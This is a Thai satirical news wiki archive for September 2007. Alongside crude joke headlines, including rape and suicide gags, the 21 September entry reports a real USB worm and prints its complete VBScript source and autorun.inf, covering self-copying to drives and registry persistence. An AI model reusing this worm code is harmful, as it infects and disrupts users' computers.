กันยายน 2550

UNNEWS

ยินดีต้อนรับสู่ไร้ข่าวภาษาไทย
แหล่งข่าวลวงเสรีที่ทุกคนร่วมเขียนได้
วันนี้ตรงกับวันจันทร์ ที่ 19 พฤศจิกายน 2561 เวลา 12:24 น. ตามเวลาสากลเชิงพิกัด (ช้ากว่าไทย 7 ชั่วโมง)

มกราคม 2550 - กุมภาพันธ์ - มีนาคม - เมษายน - พฤษภาคม - มิถุนายน - กรกฎาคม - สิงหาคม - กันยายน - ตุลาคม - พฤศจิกายน - ธันวาคม 2550

1 กันยายน[แก้ไข]

  • เมืองไทยเปิดให้ต่างชาติเข้ามาเปิดโรงงานผลิตยานยนต์ตั้งหลายปีแล้ว
    คนไทยยังไม่มีความรู้พอจะผลิตรถยนต์แบรนด์คนไทยเองได้

ส่วนจีนเปิดไม่กี่ปี แต่มีนโยบายว่าต่างชาติต้องถ่ายทอดเทคโนโลยีให้
ทุกวันนี้จีนผลิตรถยี่ห้อของตัวเองได้แล้ว
(แต่ก็น่าเห็นใจว่า ถึงไทยผลิตได้เอง แต่คนไทยก็คงไม่อยากใช้อยู่ดี)

จากประสบการณ์ที่เคยทำงานในโรงงานญี่ปุ่นมา นอกจากนโยบายจะไม่เอื้ออำนวยต่อการให้คนไทยเรียนรู้ได้เองแล้ว คนที่ทำงานในโรงงานบางส่วนอาจพอใจที่จะทำงานตามคำสั่งไอ้ยุ่น คนญี่ปุ่น ไปวันๆ โดยไม่ได้สนใจจะเรียนรู้อะไรมากนัก

11 กันยายน[แก้ไข]

  • สาเหตุเพียงแค่มองหน้าไม่ถูกชะตาแล้วตบตีกันสำหรับผู้หญิงคู่นี้ หรือท่านขับรถไปบนถนนแล้วมีปัญหากับรถคันอื่นไม่ว่าจะเป็นรถเมล์เขียว รถร่วม รถแท็กซี่ แล้วลงมาชกกัน หรือนั่งกินเหล้าร้องคาราโอเกะ ไม่พอใจโต๊ะอื่นแล้วยกพวกตีกัน เรื่องเหล่านี้มันเกิดได้กับทุกๆคน ไม่ว่าจะอยู่หรือจบจากสถาบันการศึกษาใด มันอยู่ที่ตัวบุคคลที่เข้าไปอาศัยสถาบันฯ เขาเรียนมากกว่า ท่านที่บอกว่าสถาบันนู้นนี้ไม่ดี เลยทำให้คนมันเลว ผมว่าไม่แฟร์นะ คนที่ว่าคนอื่นน่ะ คุณเลิศเลอมาจากไหนหรือ... เว้นแต่พวกที่ยกพวกตีกัน สร้างความเดือดร้อนให้คนอื่น เช่นเอาหินขว้างขึ้นมาบนรถเมล์ โดยอ้างสถาบันตัวเองว่าเหนือกว่า แล้วสถาบันนั้นก็ไม่จัดการอะไรกับไอ้พวกนี้ ถ้าอย่างนี้นะถึงจะเรียกว่าเลวจริง
  • ถ้าต่อไปมหาลัยฯ จะต้องออกนอกระบบฯ ตามนโยบายของคุณวิจิตร ศีรษะล้าน แล้วละก็ คนที่มีเงินน้อยจะมีโอกาสเรียนจบได้อย่างไร
  • ที่ชอบพูดกันว่า "มึงรู้ไหมกูเป็นใคร" หรือ"มึงรู้ไหมพ่อกูเป็นใคร" ผมว่าคนที่พูดน่ะปัญญาอ่อนสิ้นดี เพราะตัวมันเองมันยังไม่รู้ตัวเองเลยว่าตัวมันเป็นใคร หรือพ่อมันเป็นใคร เลยต้องไปถามชาวบ้านเขา... ใหญ่ขนาดไหนก็เล็กกว่าโลงอยู่ดี จำไว้นะน้อง
  • ความคิดเห็นที่ 418 "ทำรายงานหรือจะทำอะไรตอนห้าทุ่มกันแน่?" ผมว่าไม่แฟร์นะ เพราะรูปแบบการใช้ชีวิตของคนยุคนี้โดยเฉพาะในเมืองใหญ่ๆ มันเปลี่ยนไปมา เดี๋ยวนี้ทั้งร้านคอมและร้านสะดวกซื้อ มันก็เปิดกันตลอดเวลา การออกไปใช้บริการร้านเหล่านี้มันก็เป็นเรื่องปกติของคนทั่วไป ซึ่งจะต่างจากสมัยก่อนที่ทุกบ้านจะนอนแต่หัวค่ำ แต่ปัจจุบันมีความหลากหลายทางด้านเวลามากขึ้น คนนอนดึกมีมากขึ้น บางคนก็ทำงานแบบเข้ากะ บางคนก็กลับบ้านช้าลงเพื่อเลี่ยงรถติด อย่างร้านคอม ผมและเพื่อนๆ ก็เลือกที่จะไปใช้บริการตอนดึกๆ เพราะหัวค่ำ เด็กเล่นเกมส์กันเยอะ เครื่องมักจะไม่ว่าง หรือถ้าว่าง เสียงก็จะดังเอะอะ การที่น้องเค้าจะเลือกไปใช้บริการตอนไหนมันก็เป็นสิทธิ์ของเขา

12 กันยายน[แก้ไข]

ส่วนรุ่นนี้ก็ยังคงขายไม่ออกอยู่เหมือนเดิม (เพราะแพงเกินไป) กลายเป็นรถที่หายากมากขึ้นไปอีก

สิบอันดับแรก รถยนต์ที่ขายดีที่สุดในประเทศเทย ประเทศจีน ประจำเดือนสิงหาคม 2550

  • โว้กสว้ากเกิ่น สันทนา (Santana) (18130 คัน)
    มีในจีนมายี่สิบกว่าปีแล้ว และยังไม่ได้เปลี่ยนเป็นโมเดลใหม่เลย มีแค่ปรับเปลี่ยนรูปลักษณ์เล็กน้อยไม่กี่ครั้งเท่านั้น
  • โว้กสว้ากเกิ่น เย็dด้า 7 ตา (Jetta) (17219)
  • Buick Excelle (15093)
  • จตุคัมรี่ (13255)
  • สโกเด้า อ็อกตาเวีย (12126)
  • ฝอด โฟกุ๊ส (11216)
  • ปลื้ม (ทีเด้า) (10339)
  • โว้กสว้ากเกิ่น ผัดสาด (Passat) (10315)
  • ฉีรุ่ย กิ๊วกิ๊ว (Chery QQ) (9827)
  • Xiali N3 (9321)

(ที่มา)

คนจีนเขาอ่านไม่ออกหรอกครับ
ขอไว้อาลัยให้แก่คน 10340 คน ณ ที่นี้ด้วยครับ (รวม จขกท. และไม่รวม "ผีเซนเตอร์")

15 กันยายน[แก้ไข]

  • ผู้จัดเกรียน : "แม้ว" ปราม "หมัคร" กำชับหนักแน่น คุณเป็นได้แค่นอมินีการเมืองเท่านั้นนะโว้ย ห้ามข้องแวะกับ "ใหม่-ลีเดีย" เด็ดขาด ทางด้านหมัครออกท่าทีลังเล จะไม่ยอมเป็นหัวหน้าพรรคพังประชาชิน เหตุหากเป็นนอมินีแล้วต้องเป็นให้ครอบคลุมรอบด้าน ไม่งั้นจะเป็นทำแมวอะไร (อ่านต่อ)

18 กันยายน[แก้ไข]

0 คะแนน

กราตะหยิดเฮ! ไอ้0006ตายไปจากวิชา252286ก่อนเวลาอันควร

กราตะหยิด กุลทองลิ้ม เฮลั่น หลังพบว่าศัตรูหมายเลข0006ของหล่อน ซึ่งก็คือ "กริด ฑรราช" นั่นเอง ตายไปจากวิชา 252286 ก่อนเวลาอันสมควร ทำให้ไม่ต้องทำการทดลองร่วมกันอีกต่อไป
» อ่านต่อในฉบับ

กลุ่มพ่อมดแดง

กลุ่มพ่อมดแดงยืนยัน ไม่รับร่างรัฐธรรมN00B

กลุ่มพ่อมดแดง ประกาศกร้าว "กูมาเอง ไม่ได้มีใครจ้างกูมา กูไม่รับร่างรัฐธรรมN00Bฉบับใหม่แน่"
» อ่านต่อในฉบับ

20 กันยายน[แก้ไข]

  • สภาน้ำชาสาขาไร้สาระนุกรมเปิดให้บริการแล้ว โดยสภาน้ำชานั้นจะเป็นที่พูดคุยและพบปะสังสรรค์ของเหล่าชาวไร้สาระนุกรมทั้งหลาย แม้แต่เรื่องที่อยากจะระบายหรือโวยวายก็สามารถเข้าไปใช้บริการที่นั่นได้ตั้งแต่บัดนี้เป็นตันไป (อ่านต่อ)
  • หมูทุบ เข้าได้แล้ว!!! ในที่สุดบร๊ะเจ้าก็เมตตา ทรงสั่งให้ ICT ปลดบล็อคซะที

21 กันยายน[แก้ไข]

ข่าวนี้เป็นความจริง ไม่ได้เป็นมุขตลกแต่อย่างใด - ผู้อ่าน:Love Krittaya 08:22, 21 กันยายน 2007 (UTC)

virus : Cricketworldcup2007.dll.vbs

ชายคนหนึ่งในมหาวิทยาลัยเชียงใหม่ ได้พบมันแล้ว (และคอมที่พบนั้นมี NOD32 โปรแกรมป้องกันและกำจัดไวรัส (ที่เขาว่ากันว่ามันเทพ) ซะด้วย) และคาดว่ามีคนพบมันไปก่อนหน้านี้แล้วหลายล้านคน... แต่ไวรัสนี้ไม่ยักตกเป็นข่าวแฮะ

(ที่มา : 1 และ 2) ไวรัสนี้ มีผลหลักๆ คือ

  • ทำให้ชื่อ IE ขึ้นว่า Good Luck! Sri Lankan Cricket Team
  • ดับเบิ้ลคลิกไดรว์ต่างๆ แล้วไม่ขึ้น เพราะ autorun.inf จะไปสั่งให้วินโดวส์โหลดไวรัสขึ้นมาแทน
  • ถึงแม้ว่าเราจะ
    • ปิดโพรเซส wscript.exe
    • ลบ Cricketworldcup2007.dll.vbs
    • และลบ autorun.inf

ได้ทั้งสามอย่างแล้วก็จริง แต่สุดท้าย ก็ดับเบิลคลิกเปิดดูไฟล์ในไดรว์ต่างๆ โดยตรงไม่ได้อยู่ดี เพราะไวรัสนี้มันไปแก้ REGISTRY ให้เรียกตัวมันเองแทนเสียแล้ว แล้ววินโดวส์ (ที่จริงคือ wscript.exe ต่างหาก) ก็จะร้องขึ้นบนจอว่า Can not find script file "D:\Cricketworldcup2007.dll.vbs".

ด้านล่างนี้จะแสดงโค้ดไวรัสให้ได้ชมกันเป็นขวัญตา ไม่ทราบว่าทาง ARDV จะป้องกันไวรัสนี้ได้หรือไม่!?

  • ไฟล์ autorun.inf

[autorun]
shellexecute=wscript.exe Cricketworldcup2007.dll.vbs

  • ไฟล์ Cricketworldcup2007.dll.vbs

'modified by nastygOrgOn
on error resume next
'dim ms,wd,ud,fm,tgf,reg,not,chk,bg
dim fs,atrbs
atrbs = "[autorun]"&vbcrlf&"shellexecute=wscript.exe
Cricketworldcup2007.dll.vbs"
set fs = createobject("Scripting.FileSystemObject")
set fm = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = fm.size
chk = fm.drive.drivetype
set text=fm.openastextstream(1,-2)
do while not text.atendofstream
ms=ms&text.readline
ms=ms & vbcrlf
loop
do
Set wd = fs.getspecialfolder(0)
set tgf = fs.getfile(wd & "\Cricketworldcup2007.dll.vbs")
tgf.attributes = 32
set tgf=fs.createtextfile(wd & "\Cricketworldcup2007.dll.vbs",2,true)
tgf.write ms
tgf.close
tgf.attributes = 39
for each ud in fs.drives
If (ud.drivetype = 1 or ud.drivetype = 2) and ud.path <> "A:" then
set tgf=fs.getfile(ud.path &"\Cricketworldcup2007.dll.vbs")
tgf.attributes =32
set tgf=fs.createtextfile(ud.path
&"\Cricketworldcup2007.dll.vbs",2,true)
tgf.write ms
tgf.close
tgf.attributes =39
set tgf =fs.getfile(ud.path &"\autorun.inf")
tgf.attributes = 32
set tgf=fs.createtextfile(ud.path &"\autorun.inf",2,true)
tgf.write atrbs
tgf.close
tgf.attributes=39
end if
next
set reg = createobject("WScript.Shell")
reg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Cricketworldcup2007",wd&"\Cricketworldcup2007.dll.vbs"
reg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Good Luck! Sri Lankan Cricket Team."
reg.regwrite "HKCR\vbsfile\DefaultIcon","shell32.dll,2"
if chk <> 1 then
Wscript.sleep 200000
end if
loop while chk<>1
set bg = createobject("Wscript.shell")
bg.run wd&"\explorer.exe /e,/select, "&Wscript.ScriptFullname

24 กันยายน[แก้ไข]

28 กันยายน[แก้ไข]

  • รายงานไวรัสคอมพิวเตอร์(ของจริง) ตัวใหม่ "Cricketworldcup2007.dll.vbs" (อ่านต่อ)
  • ชินจัง ตัวป่วนประจำ ก.ม.ม. (กอมอมอ) ถูกจับหลังจากปล้นหวย ในที่สุดศาลลงโทษชินจังด้วยการจับขังคุกเกย์เป็นเวลา 2000 ปี
  • ไร้ซอร์ซสาขาไร้สาระนุกรม ด้วยประสิทธิภาพอันสูงสุดและความรวดเร็วในการใช้งาน โดยไม่ต้องสร้างไร้หนังสือหรือ Unbooks แบบฝรั่งเขา ไอ้นั่นเชื่อ ไร้ซอร์ซจะเป็นผู้นำในด้านเอกสารราชเกรียนและเอกสารธรรมดาในเร็วๆนี้ แต่ผลการปรับปรุงผิดพลาด ทำให้การสร้างเอกสารห่วยแตก (ด่าต่อ)

29 กันยายน[แก้ไข]

1. ผู้คนแตกตื่น คลื่นยักษ์ “เนกิมะ” กลืนหาดภูเก็ต

2. “โรตีบอย คืนชีพ” หลังเพิ่มสูตรคอลลีเจล และอโรวร่า สาวๆ ชอบใจ กินยังไงก็สวย

3. “น้องตัวเดียวอันเดียว” ยอมรับ สอยกางเกงในคุณป้ามยุรา ยอมรับโรคจิตก็ใช่ แต่อยากจะเอามาคลุมจอคอมพิวเตอร์มากกว่า

4. น้ำท่วมสยามเซ็นเตอร์ แฟชั่นรองเท้าบูธกรรมกรแจ้งเกิด

5. ขสมก. แจ้งขึ้นราคารถปรับอากาศขั้นต่ำ 80 บาท ประชาชนโวย แพงไม่ว่า แต่ปรับอากาศตรงไหน แอร์เปิดตรงแต่หัวคนขับ

6. บอลไทย “แห้วไปบอลโลก” ฟีฟ่าสั่งปรับแพ้ เหตุมวยหมู่นักเตะญี่ปุ่น ทั้งๆ ที่นำ 4 – 0 ข้อหาเหยียบเท้าแล้วไม่ขอโทษ

7. ญี่ปุ่นดอง “โคนัน เล่มที่ 270” รุ่นพ่อทำใจ สงสัยตอนจบต้องให้ลูกหลานเผากงเต็กไปให้อ่าน

8. คลิปฉาว “เด็ก 14 นั่งทำการบ้าน” ยอดดาวน์โหลดหนึ่งแสนต่อวัน ไม่เคยเห็นของแปลกแบบนี้มาก่อน

9. พินาศ “รถไฟลอยฟ้าชนรถไฟใต้ดิน” ผู้ว่าฯ คิดอยู่แล้วไม่เวิร์ค ทำรางรถใส่เกลียวตีลังกา แต่อยากลองเฉยๆ

10. รักพี่เสียดายน้อง “AF ปี 25” นักล่าฝันแออัดล้นบ้านห้าสิบชีวิต 2 ใน 3 ตั้งใจโหวตตัวเองออก เพราะไม่รู้จะไปนอนที่ไหน ราวบันไดก็มีคนจองแล้ว

11. “ลูกชายซีดาน” เฮดบัดลูกชาย “มาร์โก มาเตรัซซี่” สลบเหมือด หลังมีปากเสียง “ล้อพ่อหัวไข่ดาว”

12. โจรใต้ใจบุญ สร้างโรงเรียน ก่อนจะเผาโรงเรียนเอง

13. แท็กซี่สุดเลว ปล้น “การ์ดยูกิ” หน้าภิรมย์พลาซ่า

14. มติผ่าน ตั้งตู้ขายถุงยาง 3 จุดในโรงเรียนอนุบาลหมีน้อย ผู้ปกครองกุมขมับ ฝากลูกซื้อไม่ได้ เพราะไซด์ต่างกัน

15. “สก็อยต์สาวดับอนาถ” หล่นท้ายมอไซด์ สิบล้อทับไส้แตก เด็กแวนซ์สุดเซ็ง ตายห่าไม่ว่า ทำยางกูแบนอีก บอกแล้วให้ลดความอ้วนก็ไม่ฟัง

16. จมพนา เผยเคล็ดลับ กินนิ่วช้างสร้างสมรรถภาพ ซัมเมอร์ซอล์ทได้แม้เริ่มเข้าวัยทอง

17. ปัญหาครอบครัว แม่ส่งอีเมลล์บอกลูกชายชั้น 2 ให้ลงมากินข้าวชั้นล่าง

18. ชาวเน็ตรุมด่า โพด อาโนลด์ สาเหตุสร้างหนังโชว์ตูดผู้ชายทั้งเรื่อง ผู้กำกับชี้แจง บอกพวกมรึงนี่ไม่เข้าใจศิลปะเลย หนังอาร์ตเข้าใจไหมโว้ย ไอ้ฟาย

19. Hotmail แจ้งกำหนดเก็บเงิน msn เป็นครั้งที่ 177,459 อย่าลืมส่งต่อด้วย

20. “หมูแฮม” ออกหนังสือชีวประวัติ เผยชอบมดแดงอเมซอนเพราะท่าแปลงร่าง ที่ขับรถชนขออภัย เพราะเห็นภาพหลอนนึกว่าสมุนยักษ์สิบหน้าดักรุมทำร้าย

21. อัศจรรย์รุ่นใหม่ “โนเกีย” ใช้แทนเครื่องซักผ้าได้

22. 6 โจ๋อำมหิต ข่มขืนได้แม้กระทั่งเสาไฟฟ้า คาดว่าต่อให้เมาก็ไม่น่าหื่นขนาดนี้

23. เด็ก 14 ผูกคอตาย ประชดเข้าเว็บยูทูปไม่ได้

24. “สรย้วย” ถูกหามเข้า ร.พ เหตุความดันขึ้นสูงอย่างรุนแรง หลังหงส์แดงทีมรักได้แชมป์พรีเมียร์ลีค

25. “ปังคุง” ตัดสินใจเข้ารับสมัครตำแหน่งนายกรัฐมนตรีแห่งเกาะญี่ปุ่น ลือคะแนนเสียงอาจทิ้งขาด เพราะสมาคมคนรัก ลิง ค่าง ชะนี ที่ญี่ปุ่นก็มิใช่น้อย

26. ขายหัวเราะเฉลิมฉลอง 70 ปี มุขติดเกาะ และ โจรมุมตึก แม้จะเรียกเสียงฮาไม่ได้แล้วก็ตาม

27. พ่อแม่ร่ำไห้ ลูกสาวเส้นเลือดสมองแตก เหตุเพราะตีความนิยายวัยรุ่นยากเกินไป ตำรวจเปิดดู เห็นแต่ตัวอีโมชั่นทั้งเล่ม ^ o ^

28. คลิปหลุดว่อนเน็ต น้องโฟกัสยืนฉี่ เจ้าตัวเงียบยอมรับโดยดี

29. “อากิบะ ถูกจับเป็นครั้งที่ 20” ข้อหาจำหน่ายการ์ตูนลามก ตำรวจค้นพบหลักฐานมัดตัวแน่นหนา เป็นการ์ตูนดราก้อนบอล ไม่เซ็นเซอร์หัวนมซุนโงกุน ผบ.ตำรวจยัน ดูยังไงก็อนาจาร

30. ยุบรายการ “ผู้หญิงถึงผู้หญิง” เหตุ 4 พิธีกรสื่อสารไม่รู้เรื่อง เนื่องจากเคี้ยวหมากไปด้วย

(ที่มา)

พาดหัวข่าวในปี 2568 | 2567 | 2566 | 2565 | 2564 | 2563 | 2562 | 2561 | 2560 | 2559 | 2558 | 2557 | 2556 | 2555 | 2554 | 2553 | 2552 | 2551 | 2550 | 2549